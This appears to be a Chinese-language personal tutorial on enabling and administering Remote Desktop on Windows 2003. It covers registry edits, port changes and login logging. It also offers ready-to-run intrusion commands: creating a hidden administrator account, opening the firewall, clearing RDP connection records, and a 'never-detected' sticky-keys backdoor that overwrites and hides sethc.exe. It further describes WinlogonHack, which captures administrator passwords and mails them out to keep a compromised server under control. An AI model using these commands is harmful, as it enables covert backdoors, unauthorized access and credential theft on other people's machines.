Windows 2003開啓遠程終端
1, 允許開啓
在我的電腦,屬性,遠程,選允許連接到這臺計算機。
2, 授權用戶
可以添加用戶。
3, 查看端口開放情況
Netstat –an或者netstat –an|find “3389”
4, 遠程登錄
運行mstsc程序,地址寫剛剛那臺服務器的ip或域名。然後連接,之後輸入用戶名和密碼。
常見的開啓遠程端口的方法:
1, 使用vbs腳本,
2, 使用bat批處理命令
echo[Components]>c:\sql
echoTSEnable=on>>c:\sql
sysocmgr/i:c:\winnt\inf\sysoc.inf/u:c:\sql/q
這裏的winnt應該就是相當於windows
3, 編寫導入註冊表文件
命令行:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
4, Sql注入軟件啓動
5, 其他軟件
DameWare Mini Remote Control
這裏面好多方法都比較老,對付的都是windows2000或者xp
來自國外黑客的開啓命令:
1. net user antian365.com antian365 /add
2. net localgroup Administrators antian365.com /add
3. net localgroup "Remote Desktop Users" antian365.com /add
4. attrib +h "%SYSTEMDRIVE%\Documents and Settings\antian365.com" /S /D
5. echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
6. echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
7. echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "antian365.com" /t REG_DWORD /d 00000000 /f
8. sc config rasman start= auto
9. sc config remoteaccess start= auto
10. net start rasman
11. net start remoteaccess
既然3389這麼危險,所以更改這個默認端口就很有必要了。
1, 在命令行下批處理命令
1. REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f
2. REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f
這裏要用16進制。
2, 圖形化修改:
在註冊表local_machine中system\currntcontrolsetcontrol\control\terminal server\wds\rdpwd\tds\tcp裏面的portnumber改掉。同時該
system\currntcontrolsetcontrol\control\terminal server\winstations\rdp-tcp裏面的portnumber。然後在連接的時候就在ip後面加上端口號192.168.1.128:12345
改好了之後呢要查看一下。
通過vbs腳本就不寫了,好多系統都不讓跑。通過註冊表查詢:
1. REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\ WinStations\RDP-Tcp /v PortNumber
這個命令在我這有語法錯誤。費解。用這個也不錯:
regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
生成一個註冊表文件。然後在 type tsp.reg
至於那個控制終端用戶的操作界面,就是讓你們在一起操作,沒興趣。不過查看當前控制用戶命令不錯。
Query session就能顯示你的用戶id號了。然後想和b亂搞。就shadow b的id號。然後b上就有顯示了。他同意你們就可以開始了。如果不想玩了,loggff退出。
在共同管理計算機時,普通的關機不會通知別的用戶,但是用tsshutdn 15 /powerdown15秒內關機就能通知。並且按ctrl + c可以取消。
小技巧:query process,query user.
Iisreset /reboot /timeout:00 重啓命令。
在mstsc的快捷鍵:CTRL+ALT+END任務管理器,BREAK,全屏
ALT+PGUP/DOWN 程序切換
ALT+HOME 開始,可以這樣再結合其他的快捷鍵。
限制用戶和用戶組。
在服務器端,管理工具,終端服務配置,連接,在選擇右面rdptcp的屬性,權限,就能改了,可以白所有組都刪除,然後只留一個自己的。就算有管理員密碼也不好使了。
記錄登陸信息
在上面那個屬性,審覈裏面,單機添加,然後選擇用戶是點高級,立即查找,添加everyone,然後審覈
登陸的全部
連接,註銷,斷開的成功。我猜這個就是存放在註冊表裏面的。
然後是可以在指定文件裏記錄登錄信息。
同樣,在那個rdptcp屬性裏面,有個環境,點擊登錄時啓動這個程序。寫bat程序的絕對路徑,和路徑,然後就ok了。
付上3389.bat
1. date /t >>3389log.txt
2. time /t >>3389log.txt
3. netstat -n -p tcp | find ":3389">>3389log.txt
4. start Explorer
11.實用技巧之十一--清除3389的登錄記錄
用一條系統自帶的命令:
1. reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f
在我的電腦裏找不到,這裏屬於註冊表攻擊了。
取消xp&2003系統防火牆對終端服務3389端口的限制及IP連接的限制
1. REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\ FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
12.實用技巧之十二--去掉限制登錄
終端超出最大連接數時可用下面的命令來連接
1. mstsc /v:ip:3389 /console
13.實用技巧之十三--永不查殺的3389後門
永不查殺的3389後門其原理就是利用shift後門,連敲5次Shift鍵即可直接進入服務器。將以下代碼複製到服務器上通過DOS命令提示符窗口執行即可。
1. @echo off
2. copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
3. copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
4. attrib c:\windows\system32\sethc.exe +h
5. attrib c:\windows\system32\dllcache\sethc.exe +h
6. echo. & pause
7. Exit
14.實用技巧之十四--WinlogonHack記錄3389登錄密碼,哈哈,這個軟件。
WinlogonHack的原理很簡單就是記錄管理員登錄的密碼,當有3389登上時,自動加載DLL,並且記錄登錄密碼!保存爲boot.dat文件。最新的一些版本已經可以將記錄的密碼發送到指定的郵箱,只要服務器連接網絡,那麼肉雞就永遠不會丟失。